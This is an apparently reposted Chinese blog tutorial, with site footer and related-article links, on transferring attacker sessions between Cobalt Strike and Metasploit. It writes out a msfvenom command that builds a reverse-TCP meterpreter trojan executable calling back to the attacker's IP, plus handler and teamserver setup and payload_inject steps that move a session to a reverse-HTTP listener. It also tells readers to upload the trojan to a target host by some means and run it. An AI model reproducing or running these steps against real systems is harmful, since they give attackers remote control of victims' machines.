内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

这篇具有很好参考价值的文章主要介绍了内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

在渗透中,有时候 Cobalt Strike 会话可能会受限制,所以我们需要把 Cobalt Strike 会话转移到 MSF 上进行后面的渗透。也有的时候会话在 MSF 上,但是我们需要 操作更简便 或者 展示力更好,所以我们会把 MSF 上的会话转移到 Cobalt Strike 上进行后面的渗透.


目录:

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

在 MSF 会话中 转移 会话到 CS 上.

(1)上线 MSF 会话.

(2)进行监听模式.

(3)开启 Cobalt Strike 工具.

(4)添加一个监听.

(5)会话转移到 CS 中.

在 CS 会话中 转移 会话到 MSF 上.

(1)开启 Cobalt Strike 工具.

(2)添加一个监听.

(3)生成一个程序.(木马)

(4)重新添加一个监听器.

(5)会话转移到 MSF 中.


在 MSF 会话中 转移 会话到 CS 上.

(1)上线 MSF 会话.

生成一个程序后面(木马):

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4422 -f exe > bgxg.exe

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )


(2)进行监听模式.

(1)msfconsole

(2)use exploit/multi/handler

(3)set payload windows/meterpreter/reverse_tcp

(4)set lhost 192.168.0.106                            # 本地 IP 地址

(5)set LPORT 4422                                     # 和后面一样的端口

(6)run

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )


(3)开启 Cobalt Strike 工具.

服务端:
 
(1)cd cs4.7        //切换为 cs 目录
 
(2)chmod a+x ./TeamServerImage         // 修改权限.
 
(3)./teamserver 192.168.0.106 888888   //这里的IP地址是 服务端的IP,后面的是客户端的登录密码.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )


客户端:
 
(1)cd cs4.7        // 切换为 cs 目录
 
(2)./start.sh        // 打开 客户端.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )


(4)添加一个监听.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )


(5)会话转移到 CS 中.

(1)background                // 挂起 会话.

(2)use exploit/windows/local/payload_inject

(3)set payload windows/meterpreter/reverse_http

(4)set lhost 192.168.0.101        //设置 CS 服务端的 IP 地址.

(5)set lport 8080               //设置 CS 服务端的 监听的端口(刚刚上面创建的端口号一样[CS的])

(6)set DisablePayloadHandler True

(7)set PrependMigrate True

(8)sessions -l  //查看 会话 是多少则设置多少

(9)set session 1 [一般是 1(上面查看的结果)]

(10)exploit      // 进行 测试.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )


在 CS 会话中 转移 会话到 MSF 上.

(1)开启 Cobalt Strike 工具.

服务端:
 
(1)cd cs4.7        //切换为 cs 目录
 
(2)chmod a+x ./TeamServerImage         // 修改权限.
 
(3)./teamserver 192.168.0.106 888888   //这里的IP地址是 服务端的IP,后面的是客户端的登录密码.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )


客户端:
 
(1)cd cs4.7        // 切换为 cs 目录
 
(2)./start.sh        // 打开 客户端.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )


(2)添加一个监听.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )


(3)生成一个程序.(木马)

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

想方法,把这个程序上传到目标主机并执行这个执行.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )


(4)重新添加一个监听器.

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )


(5)会话转移到 MSF 中.

(1)msfconsole                    // 打开 MSF 工具

(2)use exploit/multi/handler                                   // 设置 监听 模块.

(3)set payload windows/meterpreter/reverse_http                // 设置 payload

(4)set lport 9999                        // 设置一个端口(和上面的监听一样的端口)

(5)set lhost 0.0.0.0                    // 设置本地的 IP 地址

(6)exploit                              // 进行测试

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )

       文章来源地址https://www.toymoban.com/news/detail-487034.html

       

       

到了这里,关于内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 162.网络安全渗透测试—[Cobalt Strike系列]—[Veil免杀]

    1 Veil的使用 (1)Veil主要用于生成:免杀payload (2)下载地址:https://github.com/Veil-Framework/Veil (3)安装过程:https://blog.csdn.net/qq_53079406/article/details/126192511 2 生成有效载荷payload 选择payload Generator 选择Veil 不要选择 x64可能出错。不要打勾就可以了。 3 Veil免杀过程 运行veil 在终

    2023年04月23日
    浏览(32)
  • 154.网络安全渗透测试—[Cobalt Strike系列]—[钓鱼攻击/鱼叉钓鱼]

    我认为,无论是学习安全还是从事安全的人多多少少都有些许的情怀和使命感!!! 1、钓鱼攻击简介     网络钓鱼是指诱导人们连接那些黑客已经锁定的目标。这种攻击方法的成功率很高,也非常常见。点击链接、打开表格或者连接其他一些文件都会感染病毒。一次简单

    2024年02月11日
    浏览(32)
  • 153.网络安全渗透测试—[Cobalt Strike系列]—[生成hta/exe/宏后门]

    我认为,无论是学习安全还是从事安全的人多多少少都会有些许的情怀和使命感!!! 1、hta后门 (1)HTA简介:HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件没什么差

    2023年04月08日
    浏览(32)
  • 151.网络安全渗透测试—[Cobalt Strike系列]—[用户驱动攻击模块简介与测试]

    我认为,无论是学习安全还是从事安全的人多多少少都会有些许的情怀和使命感!!! 1、用户驱动攻击概念     用户驱动攻击User-Driven Attacks,利用人这个\\\"安全漏洞\\\"进行攻击,也就是说需要欺骗用户产生交互才行,但这种方式也有许多的优点,用户驱动攻击不包含恶意攻

    2024年02月03日
    浏览(28)
  • Cobalt Strike基本使用

    Cobalt Strike是一款由java编写的全平台多方协同渗透测试框架,在3.0版本之前它基于Metasploit框架工作,在3.0后的版本以独立成一个渗透测试平台。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技

    2024年02月05日
    浏览(29)
  • Cobalt Strike安装教程

    Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。这款神器许多大佬们都已经玩的很6,我一个菜鸡玩的略有心得,因此写一下自己的Cobaltstrike系列文章,希望给各位一点帮助。 最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上

    2023年04月08日
    浏览(29)
  • Cobalt Strike Beacon 初探

    RTO I 的课程结束了,Cobalt Strike 算是会用了。然后继上一篇文章之后,我还没有机会用 Cobalt Strike Beacon 做一下 Windows Defender Bypass。之后会写。 另外,我也想问一下我自己,Cobalt Strike 里面最基本的 payload - beacon,你了解清楚了吗? 所以今天,我就花点时间给自己解惑,同时也

    2024年02月04日
    浏览(32)
  • Cobalt Strike之反向上线操作

    Cobalt Strike 使用 GUI 框架 SWING(一种java GUI的库)开发,攻击者可通过CS木马在 beacon 元数据中注入恶意 HTML 标签,使得Cobalt Strike对其进行解析并且加载恶意代码(类似XSS攻击),从而在目标系统上执行任意代码。 攻击者需要通过CS木马在 beacon 元数据中注入恶意payload,恰好F

    2024年02月05日
    浏览(36)
  • Cobalt Strike 连接启动教程(1)

    最免杀,怕被360之类的查杀,就用带s的  一次性 第八步:右键---目标----文件管理----能进入运行了病毒牧马diannao的系统了     第十步:对方桌面任何东西点击不了,点击下面带帽子的黑色小人, 就可以操作对方电nao   点击目标-----------端口扫描---------弹出扫描框(这个扫描

    2024年02月06日
    浏览(30)
  • Cobalt Strike(cs)下载及使用

    1、启动服务 2、客户端连接服务,可以是linuxwindows 3.新建监听器 4、生成反弹shell 5、在目标机器上执行生成的exe文件,靶机可以ping同攻击机,关掉靶机杀毒

    2024年02月13日
    浏览(25)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包